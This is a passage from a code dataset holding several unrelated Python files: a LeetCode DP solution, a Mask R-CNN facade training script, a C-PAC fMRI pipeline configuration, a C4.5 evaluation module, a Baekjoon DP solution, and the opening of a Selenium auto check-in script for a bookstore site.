https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-transaction-fee/description/\n#\n# algorithms\n# Medium (58.35%)\n# Total Accepted: 114.2K\n# Total Submissions: 195.2K\n# Testcase Example: '[1,3,2,8,4,9]\\n2'\n#\n# You are given an array prices where prices[i] is the price of a given stock\n# on the i^th day, and an integer fee representing a transaction fee.\n# \n# Find the maximum profit you can achieve. You may complete as many\n# transactions as you like, but you need to pay the transaction fee for each\n# transaction.\n# \n# Note: You may not engage in multiple transactions simultaneously (i.e., you\n# must sell the stock before you buy again).\n# \n# \n# Example 1:\n# \n# \n# Input: prices = [1,3,2,8,4,9], fee = 2\n# Output: 8\n# Explanation: The maximum profit can be achieved by:\n# - Buying at prices[0] = 1\n# - Selling at prices[3] = 8\n# - Buying at prices[4] = 4\n# - Selling at prices[5] = 9\n# The total profit is ((8 - 1) - 2) + ((9 - 4) - 2) = 8.\n# \n# \n# Example 2:\n# \n# \n# Input: prices = [1,3,7,5,10,3], fee = 3\n# Output: 6\n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= prices.length <= 5 * 10^4\n# 1 <= prices[i] < 5 * 10^4\n# 0 <= fee < 5 * 10^4\n# \n# \n#\n\nfrom typing import List\n\nclass Solution:\n def maxProfit(self, prices: List[int], fee: int) -> int:\n # a means the cash\n # b means the cash - price[i]. It is the same as max_{i < j} cash[i] - price[i]\n\n a = [0]\n b = [-prices[0]]\n for i in range(1, len(prices)):\n a.append(max(a[i - 1], b[i - 1] + prices[i] - fee))\n b.append(max(b[i - 1], a[i - 1] - prices[i]))\n return a[len(prices) - 1]\n","sub_path":"python/714.best-time-to-buy-and-sell-stock-with-transaction-fee.py","file_name":"714.best-time-to-buy-and-sell-stock-with-transaction-fee.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"374924759","text":"import os\nimport sys\nimport random\nimport math\nimport re\nimport time\nimport numpy as np\nimport cv2\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# Root directory of the project\nROOT_DIR = os.path.curdir\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\nimport skimage.io\nfrom skimage import measure\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Local path to trained weights file\nCOCO_MODEL_PATH = os.path.join(ROOT_DIR, \"models/mask_rcnn_coco.h5\")\n# Download COCO trained weights from Releases if needed\nif not os.path.exists(COCO_MODEL_PATH):\n utils.download_trained_weights(COCO_MODEL_PATH)\n\n# Dataset Dir\nDATASET_DIR = \"/home/zhaiyu/Dataset/CMP_facade_DB_base\"\n\n# Configurations\n\n\nclass FacadeConfig(Config):\n \"\"\"Configuration for training on the toy facade dataset.\n Derives from the base Config class and overrides values specific\n to the toy shapes dataset.\n \"\"\"\n # Give the configuration a recognizable name\n NAME = \"facade\"\n\n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\n # GPU because the images are small. 
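# The DP in the record above keeps full arrays a (cash) and b (holding); only the
# previous values are ever read, so two scalars give the same recurrence in O(1) extra
# space. Checked against the example from the problem statement.
def max_profit(prices, fee):
    cash, hold = 0, -prices[0]
    for p in prices[1:]:
        # tuple assignment evaluates the right side with the old cash/hold values
        cash, hold = max(cash, hold + p - fee), max(hold, cash - p)
    return cash

assert max_profit([1, 3, 2, 8, 4, 9], 2) == 8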
Batch size is GPUs * images/GPU (1 here).\n    GPU_COUNT = 1\n    IMAGES_PER_GPU = 1\n\n    # Number of classes (including background)\n    NUM_CLASSES = 1 + 12 # background + 12 facade classes\n\n    IMAGE_MIN_DIM = 512\n    IMAGE_MAX_DIM = 512\n\n    STEPS_PER_EPOCH = 200\n\n\nconfig = FacadeConfig()\nconfig.display()\n\n\nclass FacadeDataset(utils.Dataset):\n    \"\"\"Generates the facade dataset.\n    \"\"\"\n\n    def load_facades(self, dataset_dir, subset):\n        \"\"\"Load a subset of the Facade dataset.\n        dataset_dir: Root directory of the dataset.\n        subset: Subset to load: train or val\n        \"\"\"\n        # Add classes\n        self.add_class(\"facade\", 1, \"1\")\n        self.add_class(\"facade\", 2, \"2\")\n        self.add_class(\"facade\", 3, \"3\")\n        self.add_class(\"facade\", 4, \"4\")\n        self.add_class(\"facade\", 5, \"5\")\n        self.add_class(\"facade\", 6, \"6\")\n        self.add_class(\"facade\", 7, \"7\")\n        self.add_class(\"facade\", 8, \"8\")\n        self.add_class(\"facade\", 9, \"9\")\n        self.add_class(\"facade\", 10, \"10\")\n        self.add_class(\"facade\", 11, \"11\")\n        self.add_class(\"facade\", 12, \"12\")\n\n        assert subset in [\"train\", \"val\"]\n        dataset_dir = os.path.join(dataset_dir, subset)\n\n        image_dir = os.path.join(dataset_dir, \"images\")\n        mask_dir = os.path.join(dataset_dir, \"masks\")\n        image_names = os.listdir(image_dir)\n\n        for image_name in image_names:\n            self.add_image(\"facade\",\n                           image_id=image_name,\n                           path=os.path.join(image_dir, image_name),\n                           mask_path=os.path.join(mask_dir, image_name[:-4] + \".png\"))\n\n    # def load_image(self, image_id):\n    #     \"\"\"Generate an image from the specs of the given image ID.\n    #     Typically this function loads the image from a file\n    #     \"\"\"\n    #     info = self.image_info[image_id]\n    #     image = skimage.io.imread(info[\"path\"], plugin='pil')\n    #     return image\n\n    def load_mask(self, image_id):\n        \"\"\"Generate instance masks given image ID.\n        \"\"\"\n        # If not a facade dataset image, delegate to parent class.\n        image_info = self.image_info[image_id]\n        if image_info[\"source\"] != \"facade\":\n            return super(self.__class__, self).load_mask(image_id)\n\n        info = self.image_info[image_id]\n        mask_path = info[\"mask_path\"]\n\n        mask = (skimage.io.imread(mask_path, as_gray=True, plugin=\"pil\") * 255).astype(np.uint8)\n\n        # First detect how many connected mask regions are inside the image\n        labels = measure.label(mask)\n        masks_this_image = []\n        class_ids = []\n        for ch in range(1, np.max(labels) + 1):\n            this_channel = (np.where(labels == ch, True, False))\n            masks_this_image.append(this_channel)\n            color_value = (np.max(mask * this_channel))\n            if color_value == 12:\n                class_id = 1\n            elif color_value == 18:\n                class_id = 2\n            elif color_value == 36:\n                class_id = 3\n            elif color_value == 54:\n                class_id = 4\n            elif color_value == 79:\n                class_id = 5\n            elif color_value == 114:\n                class_id = 6\n            elif color_value == 140:\n                class_id = 7\n            elif color_value == 175:\n                class_id = 8\n            elif color_value == 200:\n                class_id = 9\n            elif color_value == 212:\n                class_id = 10\n            elif color_value == 224:\n                class_id = 11\n            elif color_value == 236:\n                class_id = 12\n            else:\n                # Unknown gray value: fail loudly instead of silently mislabeling the region\n                raise ValueError(\"Unexpected mask color_value = {}\".format(color_value))\n            class_ids.append(class_id)\n\n        masks_this_image = np.array(masks_this_image)\n        # concatenated_masks = np.transpose(np.transpose(concatenated_masks, (2, 1, 0)), (1, 0, 2))\n        if len(masks_this_image) == 0:\n            print(\"No object mask here!\")\n            concatenated_masks = np.zeros((512, 512, 0))\n        else:\n            concatenated_masks = np.transpose(masks_this_image, (1, 2, 0))\n        # class_ids = np.ones([np.max(labels)], dtype=np.int32)\n        class_ids = np.array(class_ids, dtype=np.int32)\n        return concatenated_masks.astype(bool), class_ids\n\n    def load_image(self, image_id):\n        \"\"\"Load the specified image and return a [H,W,3] Numpy array.\n        \"\"\"\n        # Load image\n        image = skimage.io.imread(self.image_info[image_id]['path'])\n        # If grayscale. Convert to RGB for consistency.\n        if image.ndim != 3:\n            image = skimage.color.gray2rgb(image)\n        # If has an alpha channel, remove it for consistency\n        if image.shape[-1] == 4:\n            image = image[..., :3]\n        return image\n\n\n# Training dataset\ndataset_train = FacadeDataset()\ndataset_train.load_facades(DATASET_DIR, \"train\")\ndataset_train.prepare()\n\n# Validation dataset\ndataset_val = FacadeDataset()\ndataset_val.load_facades(DATASET_DIR, \"val\")\ndataset_val.prepare()\n\n# Create model in training mode\nmodel = modellib.MaskRCNN(mode=\"training\", config=config,\n                          model_dir=MODEL_DIR)\n\n\n# Which weights to start with\ninit_with = \"last\"\n\nif init_with == \"imagenet\":\n    model.load_weights(model.get_imagenet_weights(), by_name=True)\n\nelif init_with == \"coco\":\n    # Load weights trained on MS COCO, but skip layers that\n    # are different due to the different number of classes\n    # See README for instructions to download the COCO weights\n    model.load_weights(COCO_MODEL_PATH, by_name=True,\n                       exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n                                \"mrcnn_bbox\", \"mrcnn_mask\"])\nelif init_with == \"last\":\n    # Load the last model you trained and continue training\n    model.load_weights(model.find_last(), by_name=True)\n\n# Train the head branches\n# Passing layers=\"heads\" freezes all layers except the head\n# layers. You can also pass a regular expression to select\n# which layers to train by name pattern.\nmodel.train(dataset_train, dataset_val,\n            learning_rate=config.LEARNING_RATE,\n            epochs=1,\n            layers='heads')\n
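A side note on load_mask above: the long elif chain maps mask gray values to class ids one by one; a lookup table expresses the same mapping more compactly. A sketch, with the gray values copied from the chain itself:

# mask gray value -> facade class id (values copied from the elif chain above)
COLOR_TO_CLASS = {12: 1, 18: 2, 36: 3, 54: 4, 79: 5, 114: 6,
                  140: 7, 175: 8, 200: 9, 212: 10, 224: 11, 236: 12}

def class_id_for(color_value):
    try:
        return COLOR_TO_CLASS[color_value]
    except KeyError:
        raise ValueError("Unexpected mask color_value = {}".format(color_value))

assert class_id_for(79) == 5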
\n# Fine tune all layers\n# Passing layers=\"all\" trains all layers. You can also\n# pass a regular expression to select which layers to\n# train by name pattern.\nmodel.train(dataset_train, dataset_val,\n            learning_rate=config.LEARNING_RATE / 10,\n            epochs=15, # used to be 2\n            layers=\"all\")\n\n","sub_path":"train_facade.py","file_name":"train_facade.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"174862574","text":"import os\nimport commands\n\n\"\"\"\n=================\nComputer Settings\n=================\n\"\"\"\n# True = Run on compute cluster\n# False = Run on local machine\nrunOnGrid = False\n\n# Number of subjects to run simultaneously\n# This number depends on computing resources\n# Only applies when running on a local machine with multiple cores\nnumSubjectsAtOnce = 5\n\n# Number of cores (local) or slots on a node (cluster) per subject\n# Slots are cores on a cluster node\n# This number depends on computing resources\n# Only applies when local machine has multiple cores or runOnGrid = True\nnumCoresPerSubject = 2\n\n# Options are 'SGE' (Sun Grid Engine) or 'PBS' (Portable Batch System)\n# Only applies when runOnGrid = True\nresourceManager = 'SGE'\n\nqueue = 'all.q'\n\n\n# The options below are for SGE only.\n# SGE users must set this environment.\n# An easy way to list your parallel environments is to execute the following command on the cluster:\n# $ qconf -spl\n\n# A pipeline for each subject that needs preprocessing is spawned on single nodes of the cluster.\n# To avoid I/O overhead the pipeline should only use the resources (cores) from that node.\n# Users can enable this feature on Sun Grid Engine by modifying their parallel environment\n# or adding a new parallel environment using the existing environment parameters (some parameters tweaked).\n\n# To create a new environment from an old environment, follow this procedure:\n\n# 1. find the parallel environments you have on the cluster\n# $ qconf -spl\n\n# 2. look through your parallel environments. Mine looks like this\n\n#$ qconf -sp mpi\n# pe_name mpi\n# slots 999\n# user_lists NONE\n# xuser_lists NONE\n# start_proc_args NONE\n# stop_proc_args NONE\n# ---># allocation_rule $fill_up\n# control_slaves TRUE\n# job_is_first_task FALSE\n# urgency_slots min\n# accounting_summary TRUE\n\n# 3. use the old environment to create the new one\n# $ qconf -sp mpi > cpac_mpi \n\n# 4. change the allocation_rule highlighted with the arrow to $pe_slots;\n# use your favourite text editor to accomplish this\n\n# 5. Add your new environment file to SGE \n\n# qconf -Ap cpac_mpi\n\n# 6. Specify this new environment below\nparallelEnvironment = 'mpi'\n
\n\"\"\"\n====================\nData Directory Setup ***\n====================\n\"\"\"\n# NOTE: Users must manually create these directories before running C-PAC\n\n# Directory where C-PAC should store temporary and intermediate files\nworkingDirectory = '/home/bcheung/yard_sale/p_work'\n\n# Directory where C-PAC should place crash logs\ncrashLogDirectory = '/home/bcheung/yard_sale/p_crash'\n\n# Directory where C-PAC should put processed data\nsinkDirectory = '/home/bcheung/yard_sale/p_sink'\n\n\"\"\"\n========================\nResolution and Smoothing ***\n========================\n\"\"\"\n# Set the resolution (in mm) to which images are transformed\n# Transformation occurs during registration and is required for many measures\nstandardResolution = '3mm'\n\n# Width (FWHM, in mm) of the Gaussian kernel used for spatial smoothing\n# To skip smoothing, set to 0\nfwhm = [4]\n\n\"\"\"\n========================\nResource Directory Setup NOT FINISHED - NEED MORE INFO FOR FSL FILES\n========================\n\"\"\"\n# Directory where FSL is located\n# If you have added FSL to your .bashrc file, this will be set automatically\nFSLDIR = commands.getoutput('echo $FSLDIR')\n\n# The following options specify the path of various resources provided by FSL\n# By default, C-PAC will automatically locate these files based on FSLDIR\n# Most users will not need to modify these values\n\n# For users wishing to use non-standard versions of these resources:\n## 1) Delete the string in parentheses beginning with FSLDIR\n## 2) Replace this value with the full path to the appropriate file\n\nstandardResolutionBrain = os.path.join(FSLDIR,'data/standard/MNI152_T1_%s_brain.nii.gz' % (standardResolution))\n\nstandard = os.path.join(FSLDIR,'data/standard/MNI152_T1_%s.nii.gz' % (standardResolution))\n\n# NOTE: no leading slash here; an absolute second argument would make os.path.join discard FSLDIR\nstandardBrainMaskDiluted = os.path.join(FSLDIR,'data/standard/MNI152_T1_%s_brain_mask_dil.nii.gz' % (standardResolution))\n\nconfigFile = os.path.join(FSLDIR,'etc/flirtsch/T1_2_MNI152_%s.cnf' % (standardResolution))\n\nbrainSymmetric = os.path.join(FSLDIR,'data/standard/MNI152_T1_2mm_brain_symmetric.nii.gz')\n\nsymmStandard = os.path.join(FSLDIR,'data/standard/MNI152_T1_2mm_symmetric.nii.gz')\n\ntwommBrainMaskDiluted = os.path.join(FSLDIR,'data/standard/MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz')\n\nconfigFileTwomm = os.path.join(FSLDIR,'etc/flirtsch/T1_2_MNI152_2mm.cnf')\n\nidentityMatrix = os.path.join(FSLDIR,'etc/flirtsch/ident.mat')\n\nharvardOxfordMask = os.path.join(FSLDIR,'data/atlases/HarvardOxford/HarvardOxford-sub-maxprob-thr25-2mm.nii.gz')\n\nboundaryBasedRegistrationSchedule = os.path.join(FSLDIR, 'etc/flirtsch/bbr.sch')\n\"\"\"\n=============================\nOptional Timeseries Overrides ***\n=============================\n\"\"\"\n# Ignore volumes before this timepoint\n# Options are an integer or None (defaults to beginning of timeseries)\nstartIdx = 0\n\n# Ignore volumes after this timepoint\n# Options are an integer or None (defaults to end of timeseries)\nstopIdx = None\n\n# Specify a TR other than what is listed in image headers\n# Options are an integer or None (defaults to header information)\nTR = None\n\n\"\"\"\n================================\nPreprocessing Workflow Selection ***\n================================\n\"\"\"\n# Set which preprocessing workflows to run.\n\n# WARNING:\n# Many measures and outputs require that these workflows be run.\n# Please refer to the developer documentation before changing these settings.\n# Options (here and for most other settings) are: 1 = run, 0 = skip\n
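One caveat behind the FSL paths above: os.path.join discards all earlier components when a later component is absolute, so a leading slash (as standardBrainMaskDiluted originally had) would silently drop FSLDIR. A quick demonstration, valid on POSIX systems:

import os.path

# a later absolute component resets the join and drops everything before it
assert os.path.join("/usr/share/fsl", "/data/standard") == "/data/standard"
# a relative component extends the prefix as intended
assert os.path.join("/usr/share/fsl", "data/standard") == "/usr/share/fsl/data/standard"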
\nrunAnatomicalDataGathering = [1]\n\nrunFunctionalDataGathering = [1]\n\nrunAnatomicalPreprocessing = [1]\n\nrunFunctionalPreprocessing = [1]\n\nrunRegistrationPreprocessing = [1]\n\nrunBoundaryBasedRegistration = [1]\n\nrunRegisterFuncToMNI = [1]\n\nrunAnatomicalToFunctionalRegistration = [1]\n\nrunSymbolicLinks = [0]\n\n\"\"\"\n=========================================\nProbabilistic Tissue Segmentation Options *** NEED TO FIX PRIOR PATH\n=========================================\n\"\"\"\n# Run automatic tissue segmentation\nrunSegmentationPreprocessing = [1]\n\n# C-PAC uses FSL to automatically distinguish tissue types based on priors.\n# Each prior represents the probability that a given voxel will be \n# of a particular tissue type (white matter, gray matter, or CSF).\n\n# Please specify the location and name of your prior files.\n# Priors distributed with FSL must be binarized to be used by C-PAC\n# For information about how to do this, please see the User Guide\nprior_path = '/home2/data/Projects/C-PAC/tissuepriors/%s' % standardResolution\n\n# These values will be set automatically based on prior_path\nPRIOR_CSF = os.path.join(prior_path, 'avg152T1_csf_bin.nii.gz')\nPRIOR_GRAY = os.path.join(prior_path, 'avg152T1_gray_bin.nii.gz')\nPRIOR_WHITE = os.path.join(prior_path, 'avg152T1_white_bin.nii.gz')\n\n# Set thresholds for use during automatic tissue segmentation.\n# Values correspond to probability thresholds for a given tissue type.\n# For example, setting a value of 0.8 will result in areas with an 80 percent \n# probability of being a particular tissue type to be classified as such\n\ncerebralSpinalFluidThreshold = [0.98]\n\nwhiteMatterThreshold = [0.98]\n\ngrayMatterThreshold = [0.7]\n\n\"\"\"\n==================================\nNuisance Signal Correction Options *** \n==================================\n\"\"\"\n# Run nuisance signal correction\nrunNuisance = [1]\n\n# Select which nuisance signal corrections to apply:\n## compcor = CompCor\n## wm = White Matter \n## csf = CSF\n## gm = Gray Matter\n## global = Global Mean Signal\n## pc1 = First Principal Component\n## motion = Motion\n## linear = Linear Trend\n## quadratic = Quadratic Trend\n\n# Options are 1 (apply) or 0 (ignore)\nCorrections = [{'compcor' : 1,\n                'wm' : 1,\n                'csf' : 1,\n                'gm' : 0,\n                'global' : 0,\n                'pc1' : 0,\n                'motion' : 1,\n                'linear' : 1,\n                'quadratic' : 0}]\n\n# Number of Principal Components to calculate for CompCor (usually 5 or 6)\n# Only for use when 'compcor' is set to 1\nnComponents = [5]\n\n# Run median angle correction\nrunMedianAngleCorrection = [0]\n\n# Target angle for median angle correction\ntargetAngleDeg = [90]\n\n# Run Scrubbing\nrunScrubbing = [1]\n\n# Generate FD and DVARS motion statistics\n# Required to run scrubbing, but can also be used as regressors in a GLM\nrunGenerateMotionStatistics = [1]\n\n# Specify maximum acceptable Framewise Displacement (in mm)\n# Any volume with displacement greater than this value will be removed.\n# One volume before and two volumes after each over-threshold volume\n# will also be removed\nscrubbingThreshold = [0.2]\n\n\"\"\"\n==========================\nTemporal Filtering Options ***\n==========================\n\"\"\"\n# Apply Temporal Filtering\nrunFrequencyFiltering = [1]\n\n# First value = Lower bound for a band-pass filter\n# Second value = Upper bound for a band-pass filter\n# To use a high-pass filter, set the second value to NONE\n# To use a low-pass filter, set the first value to NONE\nnuisanceBandpassFreq = [(0.01, 0.1)]\n
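The scrubbing rule documented above (drop any volume whose framewise displacement exceeds the threshold, plus one volume before and two after) can be expressed as a small mask computation. A sketch with numpy; this illustrates the stated rule, not C-PAC's actual implementation:

import numpy as np

def scrubbing_mask(fd, threshold=0.2):
    """Boolean mask of volumes to KEEP, given per-volume framewise displacement."""
    fd = np.asarray(fd, dtype=float)
    keep = np.ones(len(fd), dtype=bool)
    for i in np.flatnonzero(fd > threshold):
        keep[max(i - 1, 0):i + 3] = False  # volumes i-1, i, i+1, i+2
    return keep

# volume 3 exceeds 0.2, so volumes 2 through 5 are scrubbed
assert list(scrubbing_mask([0.1, 0.1, 0.1, 0.5, 0.1, 0.1, 0.1])) == [True, True, False, False, False, False, True]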
\n\"\"\"\n=======================================\nSeed-based Correlation Analysis Options ***\n=======================================\n\"\"\"\n# Run Seed-based Correlation Analysis\nrunSCA = [0]\n\n# SCA will be run on all ROI and voxel timeseries extracted below.\n# This means that in order to run SCA, you must also run Timeseries Extraction.\n# Seeds for SCA must be specified in roiDirectoryPath or maskDirectoryPath.\n\n\"\"\"\n==============================\nTimeseries Extraction Options ***\n==============================\n\"\"\"\n# Extract an average timeseries for each ROI\n# Required if you wish to run ROI-based SCA\nrunROITimeseries = [0]\n\n# Export ROI timeseries data\n# First value = Output .csv\n# Second value = Output numPy array\n# Options are True/False\nroiTSOutputs = [True, True]\n\n# Directory containing ROI definitions\nroiDirectoryPath = '/path/to/roi_definitions_directory'\n\n# Extract timeseries data for all individual voxels within a mask\n# Required if you wish to run voxel-based SCA\nrunVoxelTimeseries = [0]\n\n# Export voxel timeseries data\n# First value = Output .csv\n# Second value = Output numPy array\n# Options are True/False\nvoxelTSOutputs = [False, False]\n\n# Directory containing masks\nmaskDirectoryPath = '/path/to/mask_definitions_directory'\n\n# Register timeseries data to a surface model built by FreeSurfer\n# Required to run vertex timeseries extraction\nrunSurfaceRegistraion = [0]\n\n# Directory where FreeSurfer outputs surface data\n# This should be the same as SUBJECTS_DIR in .bashrc\nreconSubjectsDirectory = '/path/to/fs_output_directory'\n\n# Extract timeseries data for surface vertices\nrunVerticesTimeSeries = [0]\n\n# Export vertex timeseries data\n# First value = Output .csv\n# Second value = Output numPy array\n# Options are True/False\nverticesTSOutputs = [False, False]\n\nstartIdx = 0\nstopIdx = None\n\n\nTR = None\nsliceTimingCorrection = False\n\n\"\"\"\n===================================\nRegional Homogeneity (ReHo) Options ***\n===================================\n\"\"\"\n# Calculate Regional Homogeneity\nrunReHo = [0]\n\n# Cluster size (number of neighboring voxels)\n# Options are 7, 19, and 27\nclusterSize = 27\n\n\"\"\"\n==========================\nNetwork Centrality Options ***\n==========================\n\"\"\"\n# Calculate network centrality measures\nrunNetworkCentrality = [0]\n\n# Select which centrality measures to calculate\n# First value = Degree Centrality \n# Second value = Eigenvector Centrality\n# Options are True/False\ncentralityMethodOptions = [True, True]\n\n# Specify how connections are defined during graph construction\n# First value = Binarized (connection strength is either 0 or 1)\n# Second value = Weighted (connection strength is a correlation value)\n# Options are True/False\ncentralityWeightOptions = [True, True]\n\n# Select what type of threshold is applied to create an adjacency matrix\n# 0 = Significance threshold (P-value)\n# 1 = Sparsity threshold (Sparsity value)\n# 2 = Correlation threshold (Pearson's r)\ncorrelationThresholdOption = 1\n\n# Based on the type of threshold selected above, enter the appropriate value\n# Significance threshold = P-value\n# Sparsity threshold = sparsity value\n# Correlation threshold = Pearson's r value\n# examples: 0.05, 0.0744, 0.6\ncorrelationThreshold = 0.0744\n\n# Directory containing ROI definitions or masks\n# Using ROIs will result in node-based centrality measures\n# Using a mask will result in voxel-based centrality measures\n
templateDirectoryPath = '/path/to/centrality_mask_roi_directory'\n\n\"\"\"\n============================================\nVoxel-mirrored Homotopic Connectivity (VMHC) ***\n============================================\n\"\"\"\n# Calculate VMHC for all gray matter voxels\nrunVMHC = [0]\n\n# There are no options for VMHC\n\n\"\"\"\n====================================================\nBootstrap Analysis of Stable Clusters (BASC) Options **\n====================================================\n\"\"\"\n# Path to a mask file. Voxels outside this mask will be excluded from BASC.\nbascROIFile = '/path/to/basc_mask_file'\n\n# Number of clusters at both the individual and group level.\nbascClusters = 6\n\n# Number of bootstraps to apply to original timeseries data.\nbascTimeseriesBootstraps = 100\n\n# Number of bootstraps to apply to individual stability matrices.\nbascDatasetBootstraps = 100\n\n# Path to a text file containing Affinity Thresholds for each subject.\n# These are correlation thresholds applied prior to spectral clustering.\n# Can be subject specific when subjects have differing numbers of timepoints.\n# Subjects should be in the same order as in the main subject list.\nbascAffinityThresholdFile = '/path/to/basc_affinity_threshold_file'\n\n\"\"\"\n================================================\nConnectome-wide Association Study (CWAS) Options **\n================================================\n\"\"\"\n# Path to a mask file. Voxels outside this mask will be excluded from CWAS.\ncwasROIFile = '/path/to/cwas_mask_file'\n\n# Number of permutation tests to run on the Pseudo-F statistic\ncwasFSamples = 5000\n\n# Number of NiPype nodes to be created while computing CWAS.\n# This number depends on computing resources\ncwasParallelNodes = 10\n\n# Path to a text file containing the phenotypic regressor.\ncwasRegressorFile = '/path/to/cwas_regressor_file'\n\n\"\"\"\n==========================================================================\nAmplitude of Low Frequency Oscillations (ALFF) and fractional ALFF Options ***\n==========================================================================\n\"\"\"\n# Calculate ALFF and fALFF\nrunALFF = [0]\n\n# NOTE: Frequency filtering is not applied when calculating fALFF\n\n# Frequency cutoff (in Hz) for a high-pass filter\nhighPassFreqALFF = [0.01]\n\n# Frequency cutoff (in Hz) for a low-pass filter\nlowPassFreqALFF = [0.1]\n \n\"\"\"\n============================\nGroup Statistics Options ***\n============================\n\"\"\"\n# Path to list of subjects on which to run group statistics\n# This file should be created automatically when you run extract_data.py\n# The order of subjects in this list must match the order in your model\ngroupAnalysisSubjectList = '/path/to/subject_list_group_analysis.txt'\n\n# Select which measures should be included in group analysis:\n## sca_seed_Z_to_standard_smooth = voxel-based SCA\n## sca_roi_Z_to_standard_smooth = ROI based SCA\n## alff_Z_to_standard_smooth = ALFF\n## falff_Z_to_standard_smooth = fALFF\n## vmhc_z_score_stat_map = VMHC\n## reho_Z_to_standard_smooth = ReHo\nderivativeList = ['sca_seed_Z_to_standard_smooth', \\\n                  'sca_roi_Z_to_standard_smooth', \\\n                  'alff_Z_to_standard_smooth', \\\n                  'falff_Z_to_standard_smooth', \\\n                  'vmhc_z_score_stat_map', \\\n                  'reho_Z_to_standard_smooth']\n
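For the sparsity threshold offered in the centrality options above (option 1, e.g. 0.0744), the idea is to keep only the strongest fraction of connections when building the adjacency matrix. A sketch of one way to apply such a threshold to a correlation matrix; again an illustration, not C-PAC's code:

import numpy as np

def sparsity_threshold(corr, sparsity=0.0744):
    """Binarize a correlation matrix, keeping the top `sparsity` fraction of off-diagonal edges."""
    c = corr.copy()
    np.fill_diagonal(c, -np.inf)               # never self-connect
    iu = np.triu_indices_from(c, k=1)          # count each undirected edge once
    n_keep = max(1, int(round(sparsity * len(iu[0]))))
    cutoff = np.sort(c[iu])[-n_keep]           # weakest edge that survives
    adj = (corr >= cutoff)
    np.fill_diagonal(adj, False)
    return adj

rng = np.random.default_rng(0)
x = rng.normal(size=(100, 6))
adj = sparsity_threshold(np.corrcoef(x, rowvar=False))
assert adj.shape == (6, 6) and adj.sum() >= 2  # symmetric, at least one kept edge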
\n# Location of a text file containing a list of FSL models\n# Each line in this file should be the path to a model directory\n# Each model directory should contain a .mat, .con, and .grp file\n# If fTest = True (see below), model directories must also contain a .fts file\n# These models can be generated through FSL, or using create_fsl_model.py\n# For instructions on using create_fsl_model.py, see the user guide\nmodelFile = '/path/to/subject_list_model_list.txt'\n\n# If a subject has multiple scans:\n# False = Consider only the first scan session during group analysis\n# True = Consider all scan sessions\nmixedScanAnalysis = False\n\nzThreshold = 2.3\n\npThreshold = 0.05\n\n# Run an F-test\n# Options are True/False\nfTest = True\n\n","sub_path":"CPAC/pipeline/config_fctest.py","file_name":"config_fctest.py","file_ext":"py","file_size_in_byte":16487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"470343631","text":"# my_impl.py\nimport pandas as pd\nimport sys\n\nfrom project.c45 import C45\nfrom sklearn.model_selection import train_test_split\n\n\ndef run_classifier(df):\n    \"\"\"\n    Run calculate_results 10 times and return the accuracies\n    \"\"\"\n    try:\n        X = df.drop(df.columns[len(df.columns) - 1], axis=1)\n        y = df.iloc[:, len(df.columns) - 1]\n\n    except Exception:\n        sys.exit(\"There was a problem processing the file\")\n\n    results = []\n    # This will run train_test_split 10 times\n    for i in range(10):\n        results.append(calculate_results(i, X, y))\n\n    accuracies = []\n    for result in results:\n        accuracies.append(sum(result['score']) / len(result['predicted']))\n\n    return accuracies\n\n\ndef calculate_results(i, X, y):\n    \"\"\"\n    Use train_test_split from scikit to shuffle and split the data\n    into training and test.\n    \"\"\"\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)\n    classifier = C45()\n    classifier.fit(X_train, y_train)\n    predicted = classifier.predict(X_test)\n\n    actual = y_test.tolist()\n    score = []\n    for pred, corr in zip(predicted, actual):\n        score.append(1 if pred == corr else 0)\n\n    results = {'actual': actual, 'predicted': predicted, 'score': score}\n    export_results(i, results)\n    return results\n\n\ndef export_results(i, results):\n    \"\"\"\n    Write each of the 10 runs to a csv file\n    \"\"\"\n    filepath = 'data/results/predictions{0}.csv'.format(i + 1)\n    df = pd.DataFrame(results)\n    df.to_csv(filepath)\n","sub_path":"project/my_impl.py","file_name":"my_impl.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"447821196","text":"# BOJ 2193 Pinary Numbers (이친수)\n# DP\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\ndp = [0]*91\ndp[1], dp[2] = 1, 1\nfor i in range(3, 91):\n    dp[i] = dp[i-1] + dp[i-2]\nprint(dp[N])\n","sub_path":"solved/Silver3/이친수.py","file_name":"이친수.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"175258416","text":"#-*- coding: utf-8 -*-\n\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common.exceptions import NoAlertPresentException\n\n\"\"\"\n0. Prerequisites\nInstall Python\nInstall Firefox and download the geckodriver matching your Firefox version\nCreate a 'kyobo' folder on the C drive\nMove geckodriver.exe and kyobo.py to C:/kyobo\n[cmd]\npip install bs4\npip install selenium\n\n1. How to run\nFill in kyobo_id and kyobo_pw below with your id and pw, then save\n[cmd]\ncd /kyobo\npython kyobo.py\n\"\"\"\n############### Add Information ###############\nkyobo_id = ''\nkyobo_pw = ''\ndriver_path = ''\n###############################################\n\nprint('Kyobo Bookstore auto check-in started')\nprint('id : ' + kyobo_id)\n
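The my_impl record above evaluates its C4.5 classifier by repeating a shuffled train/test split ten times and averaging the accuracies. A compact sketch of that protocol using sklearn's accuracy_score, assuming only that the classifier exposes fit and predict:

from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

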